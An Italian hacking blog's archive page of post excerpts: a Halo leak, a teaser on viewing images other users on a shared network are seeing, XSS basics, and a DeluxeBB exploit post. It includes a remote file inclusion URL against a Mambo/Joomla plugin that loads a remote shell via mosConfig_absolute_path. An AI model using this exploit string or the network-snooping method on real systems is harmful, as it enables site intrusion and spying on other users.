Archivi per la categoria ‘Hacking’
24 agosto 2010 | 
Autore: Bungie sta sviluppando il nuovo capitolo del videogame Halo,il capolavoro creato dalla stessa Bungie.
L'uscita ufficiale del gioco è prevista il 14 settembre,ma invece i nostri cari amici hacker sono già riusciti a condividere (come potrete vedere nel video seguente) la prima parte della missione di questo nuovo capitolo.
Condividete la stessa rete con qualche parente,oppure a scuola condividete la rete internet con altri studenti???
Qui di seguito trovate il modo per vedere in real-time le immagini che gli altri computer connessi alla rete stanno visualizzando.
Jhead è un programma che funziona su tutti i principali OS come GNU/Linux,MAC,Windows.
Jhead ci permetterà di inserire del codice nelle immagini.Ma vediamo subito come installarlo.
Pubblicato in Hacking | 
Tag: hacker, immagine, immagini, inserire codice in immagine, jhead | 
Nessun commento »
1. Cos'è un xss?
Il cross site scripting (xss) è un attacco che rientra nella categoria "code injection", ovvero "iniezione di codice". Spieghiamoci meglio…Cosa si intende per iniezione di codice? è soprattutto, che tipo di codice?? Innanzitutto partiamo col precisare che non esiste una piattaforma vulnerabile ed una non vulnerabile in generale a questo tipo di attacco. L'attacco puo' essere quindi attuato su un sito web dinamico come lo puo' essere su uno non dinamico. Detto questo, chiariamo il concetto di "iniezione di codice".
2. Iniezione di codice
Per iniezione di codice, in generale, si intende l'inserimento di uno script che venga eseguito direttamente nel nostro browser, all'interno del sito a cui sferriamo l'attacco; questa iniezione puo' essere praticata in vari modi, che in seguito analizzeremo più dettagliatamente. Vediamo ora un esempio di iniezione. Qui sotto è un esempio banale di codice di una pagina html vulnerabile a questo tipo di attacco.
E' una vulnerabilità che affligge le versione di deluxeBB uguali o inferiori alle 1.1
E' in PHP,per funzionare serve un server apache in locale.Ricordo che è tutto a puro scopo informativo e didattico e il Michele Papaleo Blog,secondo disclaimer,non si prende nessuna responsabilità dell'uso che ne farete.Cliccate su leggi tutto per avere il codice dell'exploit.
http://{PAGE}/mambots/content/josowbot.content.php?mosConfig_absolute_path={SHELL}
XPL:/mambots/content/josowbot.content.php?mosConfig_absolute_path=
Una vera e propria organizzazione criminale formata da cracker e pirati informatici con l'unico scopo di truffare le persone via il web!
Sono state arrestate diciasette persone (3 italiani,4 egiziani e 10 romeni) dal Compartimento Polizia Postale e delle Comunicazioni di Perugia.
queste procedure andrebbero fatte sempre!
